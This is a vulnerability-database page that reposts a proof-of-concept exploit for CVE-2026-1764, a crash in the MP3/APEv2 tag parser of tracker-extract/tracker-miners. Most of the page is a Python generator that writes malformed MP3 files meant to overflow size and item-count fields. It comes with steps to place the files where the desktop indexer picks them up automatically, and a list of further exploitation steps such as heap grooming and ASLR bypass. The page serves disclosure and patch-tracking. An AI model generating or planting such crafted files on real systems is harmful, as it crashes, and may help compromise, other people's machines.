Vulners
Lucene search
๐ tracker-extract 3.8.2 / tracker-miners 3.x Crash
๐๏ธย 09 Mar 2026ย 00:00:00Reported byย indoushkaTypeย 
ย packetstorm๐ย packetstorm.news๐ย 86ย Views
| Reporter | Title | Published | Views | Family All 34 |
|---|---|---|---|---|
 | Amazon Linux 2023 : tracker-miners (ALAS2023-2026-1580) | 13 Apr 202600:00 | โ | nessus |
| Fedora 43 : localsearch (2026-ba6641558a) | 22 Mar 202600:00 | โ | nessus |
| openSUSE 16 Security Update : localsearch (openSUSE-SU-2026:20821-1) | 1 Jun 202600:00 | โ | nessus |
| SUSE SLED15 / SLES15 / openSUSE 15 Security Update : tracker-miners (SUSE-SU-2026:0780-1) | 5 Mar 202600:00 | โ | nessus |
| SUSE SLES16 Security Update : localsearch (SUSE-SU-2026:21854-1) | 2 Jun 202600:00 | โ | nessus |
| Ubuntu 22.04 LTS / 24.04 LTS / 25.10 : tracker-miners vulnerabilities (USN-8019-1) | 6 Feb 202600:00 | โ | nessus |
| Linux Distros Unpatched Vulnerability : CVE-2026-1764 | 3 Feb 202600:00 | โ | nessus |
 | Low: tracker-miners | 13 Apr 202600:00 | โ | amazon |
 | GNOME localsearch MP3 Extractor ๅฎๅ จๆผๆด | 2 Feb 202600:00 | โ | cnnvd |
 | CVE-2026-1764 | 2 Feb 202616:15 | โ | cve |
10
=============================================================================================================================================
| # Title : tracker-extract 3.8.2 tracker-miners 3.x Media Parser Crash PoC |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.ubuntu.com/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/215100/ & CVE-2026-1764
[+] Summary : Crafted MP3/APEv2 tags may cause tracker-extract to crash when parsing oversized or malformed frames.
[+]PoC : id3_overflow.mp3, ape_overflow.mp3, hybrid.mp3
Place file in ~/Downloads
tracker-miners auto-indexes file
Observe crash with: journalctl -f | grep tracker
#!/usr/bin/env python3
import struct
import sys
import os
class MP3ExploitGenerator:
def __init__(self):
self.techniques = []
def create_id3v2_size_overflow(self, filename):
"""
Create ID3v2 tag with size that causes integer overflow
in tracker-miners' allocation routine
"""
with open(filename, 'wb') as f:
f.write(b'ID3')
f.write(b'\x03\x00')
f.write(b'\x00')
size = 0x1FFFFFFF
sync_safe = bytes([
(size >> 21) & 0x7F,
(size >> 14) & 0x7F,
(size >> 7) & 0x7F,
size & 0x7F
])
f.write(sync_safe)
f.write(b'TIT2')
frame_size = 0x3FFFFFFF
f.write(struct.pack('>I', frame_size))
f.write(b'\x00\x00')
f.write(b'A' * 1024)
self.techniques.append("ID3v2 size overflow (premature EOF)")
return True
def create_mp3_bitrate_confusion(self, filename):
"""
Create MP3 with conflicting bitrate/sample rate information
"""
with open(filename, 'wb') as f:
header = 0xFFFB # MPEG-1 Layer 3
header = (header & ~(0xF << 12)) | (0xF << 12)
header = (header & ~(0x3 << 10)) | (0x3 << 10)
f.write(struct.pack('>H', header))
bitrate_lookup = [0, 32, 40, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320, 0]
sample_rate_lookup = [44100, 48000, 32000, 0]
bitrate_idx = 15
sample_rate_idx = 3
f.write(b'Xing')
f.write(struct.pack('>I', 0x0000000F))
f.write(struct.pack('>I', 0xFFFFFFFF))
f.write(struct.pack('>I', 0xFFFFFFFF))
self.techniques.append("MP3 bitrate/sample rate confusion")
return True
def create_apev2_item_overflow(self, filename):
"""
APEv2 tag with item_count * item_size overflow
"""
with open(filename, 'wb') as f:
f.write(b'\xFF\xFB\x90\x64\x00\x00\x00\x00')
f.write(b'\x00' * 4000)
f.write(b'APETAGEX')
f.write(struct.pack('<I', 2000))
f.write(struct.pack('<I', 1024))
f.write(struct.pack('<I', 0x40000000))
f.write(struct.pack('<I', 0x80000000))
f.write(b'\x00' * 8)
item_size = 100
item_flags = 0
f.write(struct.pack('<I', item_size))
f.write(struct.pack('<I', item_flags))
f.write(b'Title\x00')
f.write(b'B' * item_size)
self.techniques.append("APEv2 item count overflow")
return True
def create_hybrid_file(self, filename):
"""Combine multiple techniques"""
with open(filename, 'wb') as f:
f.write(b'ID3\x03\x00\x00')
f.write(b'\x00\x00\x00\x10')
f.write(b'COMM')
f.write(struct.pack('>I', 100))
f.write(b'\x80\x00')
for i in range(5):
header = 0xFFFB
bitrate_idx = (i % 14) + 1
header = (header & ~(0xF << 12)) | (bitrate_idx << 12)
f.write(struct.pack('>H', header))
f.write(b'\x00' * 400)
f.write(b'TAG')
f.write(b'A' * 125)
f.write(b'\x00' * 1)
self.techniques.append("Hybrid ID3v2/MP3/ID3v1 confusion")
return True
def test_with_tracker(filename):
"""Simulate how tracker-miners would process the file"""
print(f"\n[+] Simulating tracker-miners parsing of {filename}")
print(" (Based on tracker-extract 3.8.2 source analysis)")
file_size = os.path.getsize(filename)
print(f" File size: {file_size:,} bytes")
with open(filename, 'rb') as f:
header = f.read(10)
if header.startswith(b'ID3'):
print(" Starts with ID3v2 tag")
version = header[3]
print(f" ID3v2.{version}.0 detected")
size_bytes = header[6:10]
size = 0
for b in size_bytes:
size = (size << 7) | (b & 0x7F)
print(f" Tag size field: {size:,} bytes")
if size > 100 * 1024 * 1024: # 100MB
print(" Large size field - potential overflow")
elif header[:2] == b'\xFF\xFB' or header[:2] == b'\xFF\xFA':
print(" MPEG audio frame detected")
f.seek(-32, os.SEEK_END)
footer = f.read(32)
if b'APETAGEX' in footer:
print(" APEv2 tag detected at end")
def main():
if len(sys.argv) < 2:
print("Usage: python3 tracker_exploit.py <test_directory>")
sys.exit(1)
test_dir = sys.argv[1]
os.makedirs(test_dir, exist_ok=True)
generator = MP3ExploitGenerator()
files = [
("id3_overflow.mp3", generator.create_id3v2_size_overflow),
("bitrate_confusion.mp3", generator.create_mp3_bitrate_confusion),
("ape_overflow.mp3", generator.create_apev2_item_overflow),
("hybrid.mp3", generator.create_hybrid_file),
]
for filename, create_func in files:
filepath = os.path.join(test_dir, filename)
print(f"\n[+] Creating {filename}...")
if create_func(filepath):
test_with_tracker(filepath)
print("\n" + "="*60)
print("VULNERABILITY SUMMARY")
print("="*60)
for i, technique in enumerate(generator.techniques, 1):
print(f"{i}. {technique}")
print("\n" + "="*60)
print("REAL EXPLOIT CONSIDERATIONS")
print("="*60)
print("""
1. Heap Feng Shui needed for reliable exploitation
2. GLib memory allocator (g_slice, g_malloc) specifics
3. tracker-miners uses GStreamer for parsing - check those code paths
4. ASLR bypass via info leaks (if any)
5. Need to control specific function pointers (GObject methods)
6. Potential sandbox/Seccomp restrictions
""")
print("\n[+] Test files created in:", test_dir)
print("[!] For actual exploitation, reverse engineer:")
print(" - tracker-extract binary")
print(" - libtracker-extract.so")
print(" - GStreamer plugins used")
if __name__ == "__main__":
main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Mar 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8